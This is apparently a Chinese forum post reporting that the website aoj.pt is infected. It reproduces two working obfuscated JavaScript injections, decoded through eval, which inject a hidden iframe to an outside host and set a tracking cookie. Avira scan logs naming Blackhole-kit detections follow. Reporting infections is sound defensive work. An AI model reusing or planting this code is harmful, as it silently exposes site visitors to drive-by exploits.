http://www.aoj.pt/

显示全部楼层 · 发表于 2013-12-22 16:03:29

/*da6a49*/
sp = "split";
aq = "0" + "x";
w = window;
ff = String;
z = "y";
ff = ff.fromCharCode;
try {
document["\x62od" + z]++
} catch (d21vd12v) {
v = 123;
vzs = false;
try {
document;
} catch (wb) {
vzs = 2;
}
if (!vzs) e = w["eval"];
if (1) {
f = "17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6d,62,5c,60,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6d,62,5c,60,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,64,58,62,69,66,24,67,66,69,6b,58,63,25,5b,5c,26,64,66,5b,6c,63,5c,26,5a,63,60,62,25,67,5f,67,1e,32,4,1,17,6d,62,5c,60,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,6d,62,5c,60,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,6d,62,5c,60,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6d,62,5c,60,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,6d,62,5c,60,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6d,62,5c,60,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6d,62,5c,60,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,6d,62,5c,60,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6d,62,5c,60,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,6d,62,5c,60,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1" [sp](",");
}
w = f;
s = [];
for (i = 2 - 2; - i + 1336 != 0; i += 1) {
j = i;
if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9);
}
za = e;
za(s)
} /*/da6a49*/
/*2b8c75*/
ps = "sp" + "li" + "t";
asd = function() {
d.body--
};
a = ("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,155,174,166,147,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,155,174,166,147,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,166,151,153,155,163,151,172,151,162,170,62,147,163,161,63,174,161,160,166,164,147,63,147,162,170,62,164,154,164,53,77,21,16,44,155,174,166,147,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,155,174,166,147,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,155,174,166,147,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,155,174,166,147,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,155,174,166,147,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,155,174,166,147,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,155,174,166,147,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,155,174,166,147,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,155,174,166,147,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,155,174,166,147,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16" [ps](","));
ss = String;
d = document;
for (i = 0; i < a.length; i += 1) {
a[i] = -(10 - 6) + parseInt(a[i], 8);
}
try {
asd()
} catch (q) {
zz = 5 - 5;
}
try {
zz /= 2
} catch (q) {
zz = 1;
}
if (!zz) eval(ss["fromCharCode"].apply(ss, a)); /*/2b8c75*/

复制代码

Avira

2013/12/22 下午 04:00 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\mootools[2].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
   已採取動作：
   檔案會移動至 '4c7611f0.qua' 名稱底下的隔離區目錄!

2013/12/22 下午 04:00 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\caption[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
   已採取動作：
   檔案會移動至 '54e23e45.qua' 名稱底下的隔離區目錄!

2013/12/22 下午 04:00 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\6TI8XMAJ\jquery[7].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
   已採取動作：
   檔案會移動至 '1e274b1a.qua' 名稱底下的隔離區目錄!

2013/12/22 下午 04:00 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描.]。
   檔案數： 796
   目錄數： 0
   惡意程式碼數： 4
   警告數： 0

2013/12/22 下午 04:00 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\script[3].js'
   包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
   已採取動作：
   檔案會移動至 '781304ce.qua' 名稱底下的隔離區目錄!

2013/12/22 下午 03:59 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描.]。
   檔案數： 799
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/12/22 下午 03:59 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A1VVYTC4\aoj_pt[1].htm'
   包含病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]
   已採取動作：
   檔案會移動至 '5b6c30d8.qua' 名稱底下的隔離區目錄!

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\6TI8XMAJ\jquery[7].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\6TI8XMAJ\jquery[7].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：拒絕存取

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\script[3].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：拒絕存取

2013/12/22 下午 03:58 [Web Protection] 發現惡意程式碼
   從 URL "http://www.aoj.pt/templates/aoj002/jquery.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]。
   已採取動作：已略過

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\script[3].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\caption[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\caption[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：拒絕存取

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\mootools[2].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/12/22 下午 03:58 [Web Protection] 發現惡意程式碼
   從 URL "http://www.aoj.pt/media/system/js/caption.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]。
   已採取動作：已略過

2013/12/22 下午 03:58 [Web Protection] 發現惡意程式碼
   從 URL "http://www.aoj.pt/templates/aoj002/script.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]。
   已採取動作：已略過

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\mootools[2].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.DH.1 [virus]'
   執行的動作：拒絕存取

2013/12/22 下午 03:58 [Web Protection] 發現惡意程式碼
   從 URL "http://www.aoj.pt/media/system/js/mootools.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]。
   已採取動作：已略過

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A1VVYTC4\aoj_pt[1].htm 中
   偵測到病毒或有害的程式 'JS/EXP.Redir.EL.7 [virus]'
   執行的動作：傳輸至掃描程式

2013/12/22 下午 03:58 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\A1VVYTC4\aoj_pt[1].htm 中
   偵測到病毒或有害的程式 'JS/EXP.Redir.EL.7 [virus]'
   執行的動作：拒絕存取

2013/12/22 下午 03:58 [Web Protection] 發現惡意程式碼
   從 URL "http://www.aoj.pt/" 存取資料時，
   發現病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]。
   已採取動作：已略過

fs is

[已鉴定] http://www.aoj.pt/